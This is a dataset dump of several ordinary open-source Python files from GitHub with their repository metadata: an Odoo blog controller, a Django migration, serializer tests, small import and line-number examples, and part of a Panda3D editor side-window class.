| text (string, lengths 4 to 1.02M) | meta (dict) |
|---|---|
from __future__ import absolute_import, unicode_literals
from sys import platform
def get_pytify_class_by_platform():
if 'linux' in platform:
from spotiplay.linux import Linux
return Linux
elif 'darwin' in platform:
from spotiplay.darwin import Darwin
return Darwin
else:
raise Exception('%s is not supported.' % platform)
| {
"content_hash": "da45f3d8985cc36f8f9e0c1e855c1c24",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 58,
"avg_line_length": 25.266666666666666,
"alnum_prop": 0.6701846965699209,
"repo_name": "jaruserickson/spotiplay",
"id": "769b7f036c9ee53924119d31ae911cfbf88d9109",
"size": "379",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spotiplay/strategy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "30689"
}
],
"symlink_target": ""
} |
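As an aside: strategy.py above simply maps sys.platform onto a backend class. A minimal self-contained sketch of the same dispatch idea, with inline stub classes standing in for the real spotiplay.linux/spotiplay.darwin modules (the stub names are invented for illustration):

from sys import platform


class _LinuxStub(object):
    name = 'linux backend'


class _DarwinStub(object):
    name = 'darwin backend'


def get_backend_class():
    # Same selection logic as get_pytify_class_by_platform(), minus the real imports.
    if 'linux' in platform:
        return _LinuxStub
    elif 'darwin' in platform:
        return _DarwinStub
    raise Exception('%s is not supported.' % platform)


if __name__ == '__main__':
    print(get_backend_class().name)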
import datetime
import werkzeug
from openerp import tools
from openerp.addons.web import http
from openerp.addons.web.http import request
from openerp.addons.website.models.website import slug
from openerp.osv.orm import browse_record
from openerp.tools.translate import _
from openerp import SUPERUSER_ID
from openerp.tools import html2plaintext
class QueryURL(object):
def __init__(self, path='', path_args=None, **args):
self.path = path
self.args = args
self.path_args = set(path_args or [])
def __call__(self, path=None, path_args=None, **kw):
path = path or self.path
for k, v in self.args.items():
kw.setdefault(k, v)
path_args = set(path_args or []).union(self.path_args)
paths, fragments = [], []
for key, value in kw.items():
if value and key in path_args:
if isinstance(value, browse_record):
paths.append((key, slug(value)))
else:
paths.append((key, value))
elif value:
if isinstance(value, list) or isinstance(value, set):
fragments.append(werkzeug.url_encode([(key, item) for item in value]))
else:
fragments.append(werkzeug.url_encode([(key, value)]))
for key, value in paths:
path += '/' + key + '/%s' % value
if fragments:
path += '?' + '&'.join(fragments)
return path
class WebsiteBlog(http.Controller):
_blog_post_per_page = 20
_post_comment_per_page = 10
def nav_list(self):
blog_post_obj = request.registry['blog.post']
groups = blog_post_obj.read_group(
request.cr, request.uid, [], ['name', 'create_date'],
groupby="create_date", orderby="create_date desc", context=request.context)
for group in groups:
begin_date = datetime.datetime.strptime(group['__domain'][0][2], tools.DEFAULT_SERVER_DATETIME_FORMAT).date()
end_date = datetime.datetime.strptime(group['__domain'][1][2], tools.DEFAULT_SERVER_DATETIME_FORMAT).date()
group['date_begin'] = '%s' % datetime.date.strftime(begin_date, tools.DEFAULT_SERVER_DATE_FORMAT)
group['date_end'] = '%s' % datetime.date.strftime(end_date, tools.DEFAULT_SERVER_DATE_FORMAT)
return groups
@http.route([
'/blog',
'/blog/page/<int:page>',
], type='http', auth="public", website=True)
def blogs(self, page=1, **post):
cr, uid, context = request.cr, request.uid, request.context
blog_obj = request.registry['blog.post']
total = blog_obj.search(cr, uid, [], count=True, context=context)
pager = request.website.pager(
url='/blog',
total=total,
page=page,
step=self._blog_post_per_page,
)
post_ids = blog_obj.search(cr, uid, [], offset=(page-1)*self._blog_post_per_page, limit=self._blog_post_per_page, context=context)
posts = blog_obj.browse(cr, uid, post_ids, context=context)
blog_url = QueryURL('', ['blog', 'tag'])
return request.website.render("website_blog.latest_blogs", {
'posts': posts,
'pager': pager,
'blog_url': blog_url,
})
@http.route([
'/blog/<model("blog.blog"):blog>',
'/blog/<model("blog.blog"):blog>/page/<int:page>',
'/blog/<model("blog.blog"):blog>/tag/<model("blog.tag"):tag>',
'/blog/<model("blog.blog"):blog>/tag/<model("blog.tag"):tag>/page/<int:page>',
], type='http', auth="public", website=True)
def blog(self, blog=None, tag=None, page=1, **opt):
""" Prepare all values to display the blog.
:return dict values: values for the templates, containing
- 'blog': current blog
- 'blogs': all blogs for navigation
- 'pager': pager of posts
- 'tag': current tag
- 'tags': all tags, for navigation
- 'nav_list': a dict [year][month] for archives navigation
- 'date': date_begin optional parameter, used in archives navigation
- 'blog_url': help object to create URLs
"""
date_begin, date_end = opt.get('date_begin'), opt.get('date_end')
cr, uid, context = request.cr, request.uid, request.context
blog_post_obj = request.registry['blog.post']
blog_obj = request.registry['blog.blog']
blog_ids = blog_obj.search(cr, uid, [], order="create_date asc", context=context)
blogs = blog_obj.browse(cr, uid, blog_ids, context=context)
domain = []
if blog:
domain += [('blog_id', '=', blog.id)]
if tag:
domain += [('tag_ids', 'in', tag.id)]
if date_begin and date_end:
domain += [("create_date", ">=", date_begin), ("create_date", "<=", date_end)]
blog_url = QueryURL('', ['blog', 'tag'], blog=blog, tag=tag, date_begin=date_begin, date_end=date_end)
post_url = QueryURL('', ['blogpost'], tag_id=tag and tag.id or None, date_begin=date_begin, date_end=date_end)
blog_post_ids = blog_post_obj.search(cr, uid, domain, order="create_date desc", context=context)
blog_posts = blog_post_obj.browse(cr, uid, blog_post_ids, context=context)
pager = request.website.pager(
url=blog_url(),
total=len(blog_posts),
page=page,
step=self._blog_post_per_page,
)
pager_begin = (page - 1) * self._blog_post_per_page
pager_end = page * self._blog_post_per_page
blog_posts = blog_posts[pager_begin:pager_end]
tag_obj = request.registry['blog.tag']
tag_ids = tag_obj.search(cr, uid, [], context=context)
tags = tag_obj.browse(cr, uid, tag_ids, context=context)
values = {
'blog': blog,
'blogs': blogs,
'tags': tags,
'tag': tag,
'blog_posts': blog_posts,
'pager': pager,
'nav_list': self.nav_list(),
'blog_url': blog_url,
'post_url': post_url,
'date': date_begin,
}
response = request.website.render("website_blog.blog_post_short", values)
return response
@http.route([
'''/blog/<model("blog.blog"):blog>/post/<model("blog.post", "[('blog_id','=',blog[0])]"):blog_post>''',
], type='http', auth="public", website=True)
def blog_post(self, blog, blog_post, tag_id=None, page=1, enable_editor=None, **post):
""" Prepare all values to display the blog.
:return dict values: values for the templates, containing
- 'blog_post': browse of the current post
- 'blog': browse of the current blog
- 'blogs': list of browse records of blogs
- 'tag': current tag, if tag_id in parameters
- 'tags': all tags, for tag-based navigation
- 'pager': a pager on the comments
- 'nav_list': a dict [year][month] for archives navigation
- 'next_post': next blog post, to direct the user towards the next interesting post
"""
cr, uid, context = request.cr, request.uid, request.context
tag_obj = request.registry['blog.tag']
blog_post_obj = request.registry['blog.post']
date_begin, date_end = post.get('date_begin'), post.get('date_end')
pager_url = "/blogpost/%s" % blog_post.id
pager = request.website.pager(
url=pager_url,
total=len(blog_post.website_message_ids),
page=page,
step=self._post_comment_per_page,
scope=7
)
pager_begin = (page - 1) * self._post_comment_per_page
pager_end = page * self._post_comment_per_page
comments = blog_post.website_message_ids[pager_begin:pager_end]
tag = None
if tag_id:
tag = request.registry['blog.tag'].browse(request.cr, request.uid, int(tag_id), context=request.context)
post_url = QueryURL('', ['blogpost'], blogpost=blog_post, tag_id=tag_id, date_begin=date_begin, date_end=date_end)
blog_url = QueryURL('', ['blog', 'tag'], blog=blog_post.blog_id, tag=tag, date_begin=date_begin, date_end=date_end)
if not blog_post.blog_id.id == blog.id:
return request.redirect("/blog/%s/post/%s" % (slug(blog_post.blog_id), slug(blog_post)))
tags = tag_obj.browse(cr, uid, tag_obj.search(cr, uid, [], context=context), context=context)
# Find next Post
visited_blogs = request.httprequest.cookies.get('visited_blogs') or ''
visited_ids = filter(None, visited_blogs.split(','))
visited_ids = map(lambda x: int(x), visited_ids)
if blog_post.id not in visited_ids:
visited_ids.append(blog_post.id)
next_post_id = blog_post_obj.search(cr, uid, [
('id', 'not in', visited_ids),
], order='ranking desc', limit=1, context=context)
if not next_post_id:
next_post_id = blog_post_obj.search(cr, uid, [('id', '!=', blog.id)], order='ranking desc', limit=1, context=context)
next_post = next_post_id and blog_post_obj.browse(cr, uid, next_post_id[0], context=context) or False
values = {
'tags': tags,
'tag': tag,
'blog': blog,
'blog_post': blog_post,
'main_object': blog_post,
'nav_list': self.nav_list(),
'enable_editor': enable_editor,
'next_post': next_post,
'date': date_begin,
'post_url': post_url,
'blog_url': blog_url,
'pager': pager,
'comments': comments,
}
response = request.website.render("website_blog.blog_post_complete", values)
response.set_cookie('visited_blogs', ','.join(map(str, visited_ids)))
request.session[request.session_id] = request.session.get(request.session_id, [])
if not (blog_post.id in request.session[request.session_id]):
request.session[request.session_id].append(blog_post.id)
# Increase counter
blog_post_obj.write(cr, SUPERUSER_ID, [blog_post.id], {
'visits': blog_post.visits+1,
},context=context)
return response
def _blog_post_message(self, user, blog_post_id=0, **post):
cr, uid, context = request.cr, request.uid, request.context
blog_post = request.registry['blog.post']
partner_obj = request.registry['res.partner']
if uid != request.website.user_id.id:
partner_ids = [user.partner_id.id]
else:
partner_ids = blog_post._find_partner_from_emails(
cr, SUPERUSER_ID, 0, [post.get('email')], context=context)
if not partner_ids or not partner_ids[0]:
partner_ids = [partner_obj.create(cr, SUPERUSER_ID, {'name': post.get('name'), 'email': post.get('email')}, context=context)]
message_id = blog_post.message_post(
cr, SUPERUSER_ID, int(blog_post_id),
body=post.get('comment'),
type='comment',
subtype='mt_comment',
author_id=partner_ids[0],
path=post.get('path', False),
context=dict(context, mail_create_nosubscribe=True))
return message_id
@http.route(['/blogpost/comment'], type='http', auth="public", methods=['POST'], website=True)
def blog_post_comment(self, blog_post_id=0, **post):
cr, uid, context = request.cr, request.uid, request.context
if post.get('comment'):
user = request.registry['res.users'].browse(cr, uid, uid, context=context)
blog_post = request.registry['blog.post']
blog_post.check_access_rights(cr, uid, 'read')
self._blog_post_message(user, blog_post_id, **post)
return werkzeug.utils.redirect(request.httprequest.referrer + "#comments")
def _get_discussion_detail(self, ids, publish=False, **post):
cr, uid, context = request.cr, request.uid, request.context
values = []
mail_obj = request.registry.get('mail.message')
for message in mail_obj.browse(cr, SUPERUSER_ID, ids, context=context):
values.append({
"id": message.id,
"author_name": message.author_id.name,
"author_image": message.author_id.image and \
("data:image/png;base64,%s" % message.author_id.image) or \
'/website_blog/static/src/img/anonymous.png',
"date": message.date,
'body': html2plaintext(message.body),
'website_published' : message.website_published,
'publish' : publish,
})
return values
@http.route(['/blogpost/post_discussion'], type='json', auth="public", website=True)
def post_discussion(self, blog_post_id, **post):
cr, uid, context = request.cr, request.uid, request.context
publish = request.registry['res.users'].has_group(cr, uid, 'base.group_website_publisher')
user = request.registry['res.users'].browse(cr, uid, uid, context=context)
id = self._blog_post_message(user, blog_post_id, **post)
return self._get_discussion_detail([id], publish, **post)
@http.route('/blogpost/new', type='http', auth="public", website=True)
def blog_post_create(self, blog_id, **post):
cr, uid, context = request.cr, request.uid, request.context
create_context = dict(context, mail_create_nosubscribe=True)
new_blog_post_id = request.registry['blog.post'].create(cr, uid, {
'blog_id': blog_id,
'name': _("Blog Post Title"),
'subtitle': _("Subtitle"),
'content': '',
'website_published': False,
}, context=create_context)
new_blog_post = request.registry['blog.post'].browse(cr, uid, new_blog_post_id, context=context)
return werkzeug.utils.redirect("/blog/%s/post/%s?enable_editor=1" % (slug(new_blog_post.blog_id), slug(new_blog_post)))
@http.route('/blogpost/duplicate', type='http', auth="public", website=True)
def blog_post_copy(self, blog_post_id, **post):
""" Duplicate a blog.
:param blog_post_id: id of the blog post currently browsed.
:return redirect to the new blog created
"""
cr, uid, context = request.cr, request.uid, request.context
create_context = dict(context, mail_create_nosubscribe=True)
nid = request.registry['blog.post'].copy(cr, uid, blog_post_id, {}, context=create_context)
new_blog_post = request.registry['blog.post'].browse(cr, uid, nid, context=context)
post = request.registry['blog.post'].browse(cr, uid, nid, context)
return werkzeug.utils.redirect("/blog/%s/post/%s?enable_editor=1" % (slug(post.blog_id), slug(new_blog_post)))
@http.route('/blogpost/get_discussion/', type='json', auth="public", website=True)
def discussion(self, post_id=0, path=None, count=False, **post):
cr, uid, context = request.cr, request.uid, request.context
mail_obj = request.registry.get('mail.message')
domain = [('res_id', '=', int(post_id)), ('model', '=', 'blog.post'), ('path', '=', path)]
#check current user belongs to website publisher group
publish = request.registry['res.users'].has_group(cr, uid, 'base.group_website_publisher')
if not publish:
domain.append(('website_published', '=', True))
ids = mail_obj.search(cr, SUPERUSER_ID, domain, count=count)
if count:
return ids
return self._get_discussion_detail(ids, publish, **post)
@http.route('/blogpost/get_discussions/', type='json', auth="public", website=True)
def discussions(self, post_id=0, paths=None, count=False, **post):
ret = []
for path in paths:
result = self.discussion(post_id=post_id, path=path, count=count, **post)
ret.append({"path": path, "val": result})
return ret
@http.route('/blogpost/change_background', type='json', auth="public", website=True)
def change_bg(self, post_id=0, image=None, **post):
if not post_id:
return False
return request.registry['blog.post'].write(request.cr, request.uid, [int(post_id)], {'background_image': image}, request.context)
@http.route('/blog/get_user/', type='json', auth="public", website=True)
def get_user(self, **post):
return [False if request.session.uid else True]
| {
"content_hash": "c1efdaca88a8bcb84b3afaaf6b36bcee",
"timestamp": "",
"source": "github",
"line_count": 359,
"max_line_length": 141,
"avg_line_length": 46.22562674094708,
"alnum_prop": 0.5854172943657728,
"repo_name": "diogocs1/comps",
"id": "12fd63f2fab6479d686bcf8754985dc04fd9ab62",
"size": "16620",
"binary": false,
"copies": "55",
"ref": "refs/heads/master",
"path": "web/addons/website_blog/controllers/main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "701"
},
{
"name": "CSS",
"bytes": "856533"
},
{
"name": "HTML",
"bytes": "299671"
},
{
"name": "Java",
"bytes": "620166"
},
{
"name": "JavaScript",
"bytes": "5844302"
},
{
"name": "Makefile",
"bytes": "21002"
},
{
"name": "PHP",
"bytes": "14259"
},
{
"name": "Python",
"bytes": "10647376"
},
{
"name": "Ruby",
"bytes": "220"
},
{
"name": "Shell",
"bytes": "17746"
},
{
"name": "XSLT",
"bytes": "120278"
}
],
"symlink_target": ""
} |
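A standalone sketch of the QueryURL helper defined at the top of the controller above: names listed in path_args become /key/value path segments, everything else is folded into the query string. The Odoo-specific browse_record/slug handling is dropped and werkzeug.url_encode is swapped for the standard library's urllib.parse.urlencode so the sketch runs on its own; the example arguments are invented.

from urllib.parse import urlencode


class SimpleQueryURL(object):
    """Cut-down version of QueryURL above, without Odoo records or slugs."""
    def __init__(self, path='', path_args=None, **args):
        self.path = path
        self.args = args
        self.path_args = set(path_args or [])

    def __call__(self, path=None, **kw):
        path = path or self.path
        for k, v in self.args.items():
            kw.setdefault(k, v)
        fragments = []
        for key, value in kw.items():
            if value and key in self.path_args:
                path += '/%s/%s' % (key, value)        # path-style argument
            elif value:
                fragments.append(urlencode({key: value}))
        if fragments:
            path += '?' + '&'.join(fragments)
        return path


blog_url = SimpleQueryURL('/blog', ['tag'], date_begin='2015-01-01')
print(blog_url(tag='python'))   # /blog/tag/python?date_begin=2015-01-01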
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('eventlog', '0029_auto_20180513_1045'),
]
operations = [
migrations.AlterField(
model_name='celerytaskprogress',
name='task_type',
field=models.IntegerField(default=0, choices=[(0, 'Bulk Site Upload'), (1, 'Multi User Assign Project'), (2, 'Multi User Assign Site'), (3, 'Report Generation'), (4, 'Site Import')]),
),
]
| {
"content_hash": "6b60a69d1bc419df36169bcd5ecf503f",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 195,
"avg_line_length": 29.944444444444443,
"alnum_prop": 0.614100185528757,
"repo_name": "awemulya/fieldsight-kobocat",
"id": "d50a871992da1f720f7a4fdb82aa552f5a054fd0",
"size": "563",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "onadata/apps/eventlog/migrations/0030_auto_20180806_1523.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "70153"
},
{
"name": "Dockerfile",
"bytes": "2462"
},
{
"name": "HTML",
"bytes": "1488442"
},
{
"name": "JavaScript",
"bytes": "674757"
},
{
"name": "Makefile",
"bytes": "2286"
},
{
"name": "Python",
"bytes": "5340355"
},
{
"name": "Shell",
"bytes": "16493"
}
],
"symlink_target": ""
} |
"""
test_in_serializers
-------------------
Tests of the fields cooperation in the serializer interfaces for serialization, de-serialization,
and validation.
"""
from . import test_settings
from rest_framework import serializers
from drf_compound_fields.fields import DictField
from drf_compound_fields.fields import ListField
from drf_compound_fields.fields import ListOrItemField
class ListSerializer(serializers.Serializer):
emails = ListField(child=serializers.EmailField(), required=False)
class EmbeddedSerializer(serializers.Serializer):
value = serializers.EmailField()
class ContainerListSerializer(serializers.Serializer):
embedded = ListField(child=EmbeddedSerializer())
class ContainerSerializer(serializers.Serializer):
embedded = ListOrItemField(child=EmbeddedSerializer())
class ListOrItemKwArgsSerializer(serializers.Serializer):
authors = ListOrItemField(
child=serializers.IntegerField(),
required=False
)
class DictSerializer(serializers.Serializer):
emails = DictField(child=serializers.EmailField(), required=False)
def test_non_list():
serializer = ListSerializer(data={'emails': 'notAList'})
assert not serializer.is_valid(), 'Non-list value should not be allowed'
assert 'emails' in serializer.errors, 'Non-list value should produce a field error'
assert serializer.errors['emails'], 'Non-list value error should be non-empty'
def test_invalid_list_item():
serializer = ListSerializer(data={'emails': ['[email protected]', 'notAnEmail']})
assert not serializer.is_valid(), 'Invalid list-item should not be allowed'
assert 'emails' in serializer.errors, 'Invalid list-item should produce a field error'
assert serializer.errors['emails'], 'Invalid list-item errors should be non-empty {0}'.format(
serializer.errors['emails'])
def test_invalid_embedded_list():
assert not ContainerSerializer(data={'embedded': [{'value': 'notAnInteger'}]}).is_valid()
def test_invalid_embedded_item():
assert not ContainerSerializer(data={'embedded': {'value': 'notAnInteger'}}).is_valid()
def test_empty_list():
serializer = ListSerializer(data={'emails': []})
assert serializer.is_valid(), 'Empty list should be allowed'
def test_valid_list():
serializer = ListSerializer(data={'emails': ['[email protected]']})
assert serializer.is_valid(), 'Valid list should be allowed'
def test_invalid_list_embedded():
serializer = ContainerListSerializer(data={'embedded': [{'value': 'text'}]})
assert not serializer.is_valid(), 'List field should be invalid'
assert 'embedded' in serializer.errors, 'Invalid field value should produce a field error'
def test_non_dict():
serializer = DictSerializer(data={'emails': 'notADict'})
assert not serializer.is_valid(), 'Non-dict value should not be allowed'
assert 'emails' in serializer.errors, 'Non-dict value should produce a field error'
assert serializer.errors['emails'], 'Non-dict value error should be non-empty'
def test_invalid_dict_value():
serializer = DictSerializer(data={'emails': {'a': '[email protected]',
'b': 'notAnEmail'}})
assert not serializer.is_valid(), 'Invalid dict-value should not be allowed'
assert 'emails' in serializer.errors, 'Invalid dict-value should produce a field error'
assert serializer.errors['emails'], 'Invalid dict-value errors should be non-empty {0}'.format(
serializer.errors['emails'])
def test_empty_dict():
serializer = DictSerializer(data={'emails': {}})
assert serializer.is_valid(), 'Empty dict should be allowed'
def test_valid_dict():
serializer = DictSerializer(data={'emails': {'a': '[email protected]'}})
assert serializer.is_valid(), 'Valid dict should be allowed'
def test_list_or_item_kwargs():
serializer = ListOrItemKwArgsSerializer(data={'authors': []})
assert serializer.is_valid(), 'Optional list-or-item should allow empty list: {0}'.format(
serializer.errors
)
| {
"content_hash": "c92a40416fdd3c566588b424dca15d38",
"timestamp": "",
"source": "github",
"line_count": 116,
"max_line_length": 99,
"avg_line_length": 34.991379310344826,
"alnum_prop": 0.7166789849716679,
"repo_name": "estebistec/drf-compound-fields",
"id": "d6301309c6b0d5401fc6f4109be5c12243f083ad",
"size": "4107",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_in_serializers.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "1230"
},
{
"name": "Python",
"bytes": "20049"
}
],
"symlink_target": ""
} |
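The tests above exercise drf-compound-fields' ListField and DictField. A minimal declaration-and-validation sketch in the same spirit; it assumes drf-compound-fields and a configured Django settings module (the tests import test_settings for that), and the serializer and field names here are invented:

from rest_framework import serializers
from drf_compound_fields.fields import ListField


class ContactSerializer(serializers.Serializer):
    # Each list item is validated by the child EmailField.
    emails = ListField(child=serializers.EmailField(), required=False)


serializer = ContactSerializer(data={'emails': ['a@example.com', 'not-an-email']})
print(serializer.is_valid())   # False: the second item fails validation
print(serializer.errors)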
def import_1():
from m_module import func
from n_module import func
func()
def import_2():
import m_module, n_module
m_module.func()
n_module.func()
def import_3():
from m_module import func as mfunc
from n_module import func as nfunc
mfunc(); nfunc()
if __name__ == '__main__':
import_1()
import_2()
import_3()
| {
"content_hash": "72f50ac210bb4530bf6b147def4d44a1",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 38,
"avg_line_length": 19.105263157894736,
"alnum_prop": 0.5922865013774105,
"repo_name": "ordinary-developer/education",
"id": "50c6a0dd52810e362efd10adf1c02900b7155cc4",
"size": "363",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "py/m_lutz-learning_py-5_ed/code/part_5-modules/ch_23-coding_basics/08-import_is_required/main.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2435"
},
{
"name": "C",
"bytes": "109331"
},
{
"name": "C#",
"bytes": "163418"
},
{
"name": "C++",
"bytes": "2504348"
},
{
"name": "CMake",
"bytes": "24185"
},
{
"name": "GLSL",
"bytes": "10134"
},
{
"name": "HTML",
"bytes": "58556"
},
{
"name": "JavaScript",
"bytes": "46010"
},
{
"name": "Makefile",
"bytes": "748"
},
{
"name": "Python",
"bytes": "189834"
},
{
"name": "QML",
"bytes": "191657"
},
{
"name": "QMake",
"bytes": "265220"
},
{
"name": "Scheme",
"bytes": "32484"
},
{
"name": "Shell",
"bytes": "2412"
}
],
"symlink_target": ""
} |
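Note that import_1() above demonstrates name shadowing: the second from-import rebinds func, so only n_module's version is reachable afterwards. A self-contained illustration that fabricates the two modules in memory, so no m_module/n_module files are needed:

import sys
import types

# Build throwaway modules so the from-imports below resolve.
for name in ('m_module', 'n_module'):
    mod = types.ModuleType(name)
    mod.func = (lambda n: lambda: print('%s.func called' % n))(name)
    sys.modules[name] = mod

from m_module import func
from n_module import func   # rebinds 'func'; the m_module one is shadowed

func()   # prints 'n_module.func called'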
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('customers', '0009_recipient_type'),
]
operations = [
migrations.AlterModelOptions(
name='recipient',
options={'ordering': ['last_name'], 'verbose_name_plural': 'Recipients'},
),
]
| {
"content_hash": "bf98bd15a9983fc76f515af3eca56cad",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 85,
"avg_line_length": 22.823529411764707,
"alnum_prop": 0.6082474226804123,
"repo_name": "davogler/POSTv3",
"id": "a0b8c1226a17d261ff2955178936b14b9e5fc04e",
"size": "412",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "customers/migrations/0010_auto_20170124_2322.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "144324"
},
{
"name": "HTML",
"bytes": "282463"
},
{
"name": "JavaScript",
"bytes": "244051"
},
{
"name": "Python",
"bytes": "358932"
}
],
"symlink_target": ""
} |
"""This provides a lineno() function to make it easy to grab the line
number that we're on.
Danny Yoo ([email protected])
"""
import inspect
def lineno():
"""Returns the current line number in our program."""
return inspect.currentframe().f_back.f_lineno
if __name__ == '__main__':
print "hello, this is line number", lineno()
print
print
print "and this is line", lineno()
| {
"content_hash": "3b44a0484ae1b290a6774800ea00ef49",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 69,
"avg_line_length": 24.294117647058822,
"alnum_prop": 0.6585956416464891,
"repo_name": "ActiveState/code",
"id": "9a7e327ab03e6663d207e6e3ae3dbb00f78d93f8",
"size": "413",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "recipes/Python/145297_Grabbing_current_line_number/recipe-145297.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "35894"
},
{
"name": "C",
"bytes": "56048"
},
{
"name": "C++",
"bytes": "90880"
},
{
"name": "HTML",
"bytes": "11656"
},
{
"name": "Java",
"bytes": "57468"
},
{
"name": "JavaScript",
"bytes": "181218"
},
{
"name": "PHP",
"bytes": "250144"
},
{
"name": "Perl",
"bytes": "37296"
},
{
"name": "Perl 6",
"bytes": "9914"
},
{
"name": "Python",
"bytes": "17387779"
},
{
"name": "Ruby",
"bytes": "40233"
},
{
"name": "Shell",
"bytes": "190732"
},
{
"name": "Tcl",
"bytes": "674650"
}
],
"symlink_target": ""
} |
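The recipe above uses Python 2 print statements. A Python 3 rendering of the same inspect trick, kept separate so the original recipe stays as published:

import inspect


def lineno():
    """Return the line number of the calling frame."""
    return inspect.currentframe().f_back.f_lineno


if __name__ == '__main__':
    print("hello, this is line number", lineno())
    print("and this is line", lineno())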
from direct.tkwidgets.AppShell import AppShell
from direct.tkwidgets.VectorWidgets import ColorEntry
from direct.showbase.TkGlobal import spawnTkLoop
import seSceneGraphExplorer
import Pmw, sys
if sys.version_info >= (3, 0):
from tkinter import Frame, IntVar, Checkbutton, Toplevel
import tkinter
else:
from Tkinter import Frame, IntVar, Checkbutton, Toplevel
import Tkinter as tkinter
class sideWindow(AppShell):
#################################################################
# sideWindow(AppShell)
# This class will open a side window which contains a scene graph and
# a world setting page.
#################################################################
appversion = '1.0'
appname = 'Navigation Window'
frameWidth = 325
frameHeight = 580
frameIniPosX = 0
frameIniPosY = 110
padx = 0
pady = 0
lightEnable = 0
ParticleEnable = 0
basedriveEnable = 0
collision = 0
backface = 0
texture = 1
wireframe = 0
enableBaseUseDrive = 0
def __init__(self, worldColor,lightEnable,ParticleEnable, basedriveEnable,collision,
backface, texture, wireframe, grid, widgetVis, enableAutoCamera, parent = None, nodePath = render, **kw):
self.worldColor = worldColor
self.lightEnable = lightEnable
self.ParticleEnable = ParticleEnable
self.basedriveEnable = basedriveEnable
self.collision = collision
self.backface = backface
self.texture = texture
self.wireframe = wireframe
self.grid = grid
self.enableAutoCamera = enableAutoCamera
self.widgetVis = widgetVis
# Define the megawidget options.
optiondefs = (
('title', self.appname, None),
)
self.defineoptions(kw, optiondefs)
if parent == None:
self.parent = Toplevel()
else:
self.parent = parent
AppShell.__init__(self, self.parent)
self.parent.geometry('%dx%d+%d+%d' % (self.frameWidth, self.frameHeight,self.frameIniPosX,self.frameIniPosY))
self.parent.resizable(False,False) ## Disable the ability to resize for this Window.
def appInit(self):
print('----SideWindow is Initialized!!')
def createInterface(self):
# The interior of the toplevel panel
interior = self.interior()
mainFrame = Frame(interior)
## Create NoteBook
self.notebookFrame = Pmw.NoteBook(mainFrame)
self.notebookFrame.pack(fill=tkinter.BOTH,expand=1)
sgePage = self.notebookFrame.add('Tree Graph')
envPage = self.notebookFrame.add('World Setting')
self.notebookFrame['raisecommand'] = self.updateInfo
## Tree Graph Page
self.SGE = seSceneGraphExplorer.seSceneGraphExplorer(
sgePage, nodePath = render,
scrolledCanvas_hull_width = 270,
scrolledCanvas_hull_height = 570)
self.SGE.pack(fill = tkinter.BOTH, expand = 0)
## World Setting Page
envPage = Frame(envPage)
pageFrame = Frame(envPage)
self.LightingVar = IntVar()
self.LightingVar.set(self.lightEnable)
self.LightingButton = Checkbutton(
pageFrame,
text = 'Enable Lighting',
variable = self.LightingVar,
command = self.toggleLights)
self.LightingButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.CollisionVar = IntVar()
self.CollisionVar.set(self.collision)
self.CollisionButton = Checkbutton(
pageFrame,
text = 'Show Collision Object',
variable = self.CollisionVar,
command = self.showCollision)
self.CollisionButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.ParticleVar = IntVar()
self.ParticleVar.set(self.ParticleEnable)
self.ParticleButton = Checkbutton(
pageFrame,
text = 'Show Particle Dummy',
variable = self.ParticleVar,
command = self.enableParticle)
self.ParticleButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.baseUseDriveVar = IntVar()
self.baseUseDriveVar.set(self.basedriveEnable)
self.baseUseDriveButton = Checkbutton(
pageFrame,
text = 'Enable base.usedrive',
variable = self.baseUseDriveVar,
command = self.enablebaseUseDrive)
self.baseUseDriveButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.backfaceVar = IntVar()
self.backfaceVar.set(self.backface)
self.backfaceButton = Checkbutton(
pageFrame,
text = 'Enable BackFace',
variable = self.backfaceVar,
command = self.toggleBackface)
self.backfaceButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.textureVar = IntVar()
self.textureVar.set(self.texture)
self.textureButton = Checkbutton(
pageFrame,
text = 'Enable Texture',
variable = self.textureVar,
command = self.toggleTexture)
self.textureButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.wireframeVar = IntVar()
self.wireframeVar.set(self.wireframe)
self.wireframeButton = Checkbutton(
pageFrame,
text = 'Enable Wireframe',
variable = self.wireframeVar,
command = self.toggleWireframe)
self.wireframeButton.pack(side=tkinter.LEFT, expand=False)
pageFrame.pack(side=tkinter.TOP, fill=tkinter.X, expand=True)
pageFrame = Frame(envPage)
self.gridVar = IntVar()
self.gridVar.set(self.grid)
